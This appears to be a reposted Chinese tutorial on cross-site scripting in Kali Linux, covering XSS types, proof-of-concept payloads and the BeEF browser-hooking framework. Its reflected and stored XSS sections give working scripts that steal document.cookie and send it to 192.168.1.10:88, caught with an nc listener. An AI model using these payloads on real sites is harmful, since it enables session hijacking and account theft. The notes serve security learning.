kali linux之xss


攻擊web客戶端

客戶端腳本語言(彈窗,廣告,在瀏覽器中執行,javascript)

javascript--與java語言無關,使用最廣的客戶端腳本語言

 

xss(cross-site scripting)

通過web站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端攻擊目的

注入客戶端腳本代碼,盜取cookie,重定向

 

使用場景:

直接嵌入html:<script> alert('xss'); </script>

元素標簽事件:<body onload=alert('xss')>

圖片標簽:<img src="javascript:alert('xss');">

其他標簽:<iframe>,<div>,and<link>

dom對象,篡改頁面內容

 

 

漏洞形成的根源:

服務器對用戶提交數據過濾不嚴

提交給服務器的腳本被直接返回給其他客戶端執行

腳本在客戶端執行惡意操作

 

xss漏洞類型

存儲型(持久型)

反射型(非持久)

DOM型

 

 

漏洞poc

<script> alert('xss')</script> 驗證彈窗

<a href=http://192.168.1.10>click  嵌入鏈接

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')>  嵌入192.168.1.10的圖片

 <script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10

 

反射型xss

彈窗驗證

 

 

 <a href=http://192.168.1.10>click 點擊click就跳轉到鏈接

 

 

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')>  嵌入192.168.1.10的圖片

 

 <script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10

 

 

 

xss竊取cookie

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源碼

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)

 

在本機服務器寫好源碼,然后用nc監聽好本機的88端口

 

執行就獲取到cookie了

 

 

 

存儲型xss

長期存儲於服務器端,每次用戶訪問都會被執行javascript腳本

name:客戶端表單長度限制--客戶端,截斷代理

 

竊取cookie源碼

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源碼

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)

 

 

 成功獲取cookie

 

 

 

beef

生成,交互payload

ruby語言編寫

服務器端--------管理hooked客戶端

客戶端---------運行客戶端瀏覽器的javascript腳本(hook)

 

瀏覽器攻擊面:

應用普遍轉移到b/s架構,瀏覽器成為統一客戶端程序

結合社會工程學方法對瀏覽器進行攻擊,攻擊瀏覽器用戶

通過注入js腳本,利用瀏覽器攻擊其他網站

 

攻擊手段:

利用網站xss漏洞實現攻擊

誘使客戶端訪問含有hook的偽造站點

結合中間人攻擊注入hook腳本

 

常見用途:

鍵盤記錄

網絡掃描

瀏覽器信息收集

綁定shell

與metasploit集成

 

 

默認用戶名密碼beef

 

Details:瀏覽器,插件版本信息,操作系統信息

Logs:瀏覽器動作----焦點變化,鼠標點擊,信息輸入

Commands:命令模塊

         綠色模塊:表示模塊適合目標瀏覽器,並且執行結果被客戶端不可見

         紅色模塊:表示模塊不適用當前用戶,有些紅色模塊也可以正常執行

         橙色模塊:模塊可用,但結果對用戶可見(CAM彈窗申請權限等)

         灰色模塊:模塊未在目標瀏覽器上測試過

 

主要模塊

Browsers

Exploits

Host

Persistence

Network

 

 

 

友情鏈接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM